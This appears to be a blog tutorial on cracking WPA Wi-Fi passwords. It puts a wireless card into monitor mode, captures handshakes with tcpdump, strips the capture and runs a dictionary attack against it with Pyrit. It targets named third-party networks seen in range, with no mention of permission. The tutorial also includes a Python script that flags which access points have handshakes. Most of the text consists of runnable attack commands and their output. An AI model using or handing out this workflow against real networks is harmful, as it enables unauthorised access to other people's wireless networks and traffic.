TCPDUMP & Pyrit


0. Check Access Points and Ad-Hoc cells in range


The command iwlist is used to display important information from wireless network interfaces.
We will use this command to obtain a list of Access Points and Ad-Hoc cells in range, and a whole bunch of information about them (ESSID, Quality, Frequency, Mode...).

iwlist wlan0 scan

From the output we can identify the type of encryption used by each network, so this is the natural first step.


1. Prepare the wireless LAN interface to capture

Here are some instructions to capture wireless LAN packets using the basic commands of iwconfig and tcpdump.

First step: to put the interface into monitor mode, right-click on the network icon in Gnome and de-select "Enable Networking" (so that networking is disabled).

Once NetworkManager and the other processes using the interface have been stopped, we open a terminal and:

sudo ifdown wlan0
sudo iwconfig wlan0 mode monitor

Check the interface status:

sudo iwconfig wlan0

Turn the interface on again:

sudo ifconfig wlan0 up

Important: select the channel to monitor using the chan option:

sudo iwconfig wlan0 chan 11

We are ready now to start capturing packets in the channel we want.


2. Use TCPDUMP to capture packets like crazy!!!

Once we have decided what we are interested in, it is time to record packets while looking for a handshake (no changes to the wlan0 configuration are needed):

sudo tcpdump -i wlan0 -n -s 0 -w file.cap

Later on we will look at other, more active strategies.
For now we will analyze the file file.cap with Pyrit.


3. Pyrit

3.0 Installation


On Debian we install pyrit directly from Synaptic.


3.1 Analyzing pcap files

We start the analysis looking for a handshake. We just open a terminal and type:

pyrit -r wifi.cap analyze

And if you are not so lucky, you get an output like this one:

#1: AccessPoint 88:25:2c:92:86:14 ('None')
  #0: Station 14:7d:c5:33:09:48
  #1: Station 4c:0b:3a:10:16:4f
#2: AccessPoint 1c:c6:3c:a9:b6:f7 ('Orange-VC67')
  #0: Station 01:00:5e:7f:ff:fa
  #1: Station d8:b3:77:33:c8:a3
#3: AccessPoint 00:01:38:f0:2a:f3 ('GRAN_BAR')
#4: AccessPoint 00:19:15:9e:f1:49 ('Tele5')
#5: AccessPoint 00:13:f7:e4:25:88 ('WLAN675326')
  #0: Station 01:00:5e:7f:ff:fa
  #1: Station 01:00:5e:00:00:fc
  #2: Station 00:1b:b1:4e:63:28
  #3: Station 01:00:5e:00:00:16
  #4: Station 01:00:5e:00:00:01
  #5: Station 4c:0b:3a:1e:60:22
  #6: Station 33:33:00:01:00:02
  #7: Station 33:33:00:01:00:03
#6: AccessPoint 00:24:6c:4a:15:81 ('urv-ambfils')
  #0: Station 70:d4:f2:c7:a5:d4
  #1: Station e4:b0:21:fa:70:74
#7: AccessPoint 62:1d:67:a1:24:d0 ('vodafone48D3')
  #0: Station 00:23:4d:cc:41:41


You obtain the BSSID and the ESSID of each access point in range, and also the MAC addresses of the computers (stations) seen talking to each access point.
But no handshake yet. Be patient: sooner or later someone will connect to the access point.

If you are lucky you get something like:

#1: AccessPoint 38:72:c0:b1:2e:96 ('JAZZTEL_2E91')
#2: AccessPoint 38:72:c0:cd:ee:76 ('JAZZTEL_EE96')
#3: AccessPoint 1c:c6:3c:a9:b6:f7 ('Orange-VC67')
  #0: Station 84:74:2a:c0:f9:14, handshake found
  #1: Station d8:b3:77:33:c8:a3, handshake found
#4: AccessPoint 00:19:15:9e:f1:49 ('Tele5')
#5: AccessPoint 00:13:f7:e4:25:88 ('WLAN499521')
#6: AccessPoint 62:1d:67:a1:24:d0 ('vodafone29D1')
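To read this listing more carefully, here is an added Python example (not part of the original post and not Pyrit's own code) that parses the analyze output, reports which access points have a captured handshake, and separates real clients from "stations" that are actually multicast group addresses (the low bit of the first octet set, e.g. 01:00:5e:... for IPv4 multicast and 33:33:... for IPv6 multicast), which Pyrit lists but which are not real devices. The sample input is a constructed excerpt of the listings above.

```python
import re
from typing import Dict, List

# Constructed sample input: an excerpt of the `pyrit -r wifi.cap analyze`
# listings shown above, embedded here so the script runs offline.
SAMPLE = """\
#1: AccessPoint 88:25:2c:92:86:14 ('None')
  #0: Station 14:7d:c5:33:09:48
#2: AccessPoint 1c:c6:3c:a9:b6:f7 ('Orange-VC67')
  #0: Station 01:00:5e:7f:ff:fa
  #1: Station d8:b3:77:33:c8:a3, handshake found
#3: AccessPoint 00:13:f7:e4:25:88 ('WLAN675326')
  #0: Station 33:33:00:01:00:02
  #1: Station 4c:0b:3a:1e:60:22
"""

AP_RE = re.compile(r"^#\d+: AccessPoint ([0-9a-f:]{17}) \('(.*)'\)$")
STA_RE = re.compile(r"^\s+#\d+: Station ([0-9a-f:]{17})(, handshake found)?$")


def is_group_address(mac: str) -> bool:
    """True for multicast/broadcast MACs: the I/G bit (LSB of the first octet) is set."""
    return int(mac.split(":")[0], 16) & 1 == 1


def parse_analyze(text: str) -> Dict[str, dict]:
    """Map BSSID -> {'essid', 'clients', 'group', 'handshake'} from Pyrit analyze output."""
    aps: Dict[str, dict] = {}
    current = None
    for line in text.splitlines():
        m = AP_RE.match(line)
        if m:
            current = m.group(1)
            aps[current] = {"essid": m.group(2), "clients": [], "group": [], "handshake": False}
            continue
        m = STA_RE.match(line)
        if m and current is not None:
            mac, found = m.group(1), m.group(2) is not None
            # Group addresses are never real clients; keep them apart so client counts are honest.
            key = "group" if is_group_address(mac) else "clients"
            aps[current][key].append(mac)
            if found:
                aps[current]["handshake"] = True
    return aps


def handshake_bssids(aps: Dict[str, dict]) -> List[str]:
    """BSSIDs for which Pyrit reported at least one complete handshake."""
    return sorted(b for b, a in aps.items() if a["handshake"])


if __name__ == "__main__":
    for bssid, ap in parse_analyze(SAMPLE).items():
        print(f"{bssid} {ap['essid']!r}: {len(ap['clients'])} client(s), "
              f"{len(ap['group'])} multicast entries, handshake={ap['handshake']}")
```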



3.2 Stripping capture files

Capture files may be large yet contain only a few useful packets, so it is convenient to generate a new file that keeps only the useful information.
To do this we open a terminal and:

pyrit -r wifi.cap -o useful_wifi.cap strip

This way we generate a very small file that is easy to handle.


3.3 Populating and batch-processing the database

Get the word list from Mauris Tech Blog.
You will have to use the same password for each step: maurisdump.blogspot.com

Import the unpacked file (34Gb...) into Pyrit:

pyrit -i 18_in_1.lst import_passwords

and wait forever... (a couple of days on an ordinary computer with a couple of CPUs).


Then get the name of your favorite SSID into Pyrit:

pyrit -e Orange-VC67 create_essid

and then...

pyrit batch

and wait another forever... At the end you are ready to attack...


3.4 Obtaining the password

Finally cross your fingers and go for it!!!

pyrit -r useful_wifi.cap attack_db

and wait another forever.

If you are lucky, the password will come out...


3.5 Another way

We can look for the password and at the same time we populate the data base:

pyrit -e Orange-VC67 -r useful_wifi.cap attack_batch

and wait for a month or so...




Raconet Linux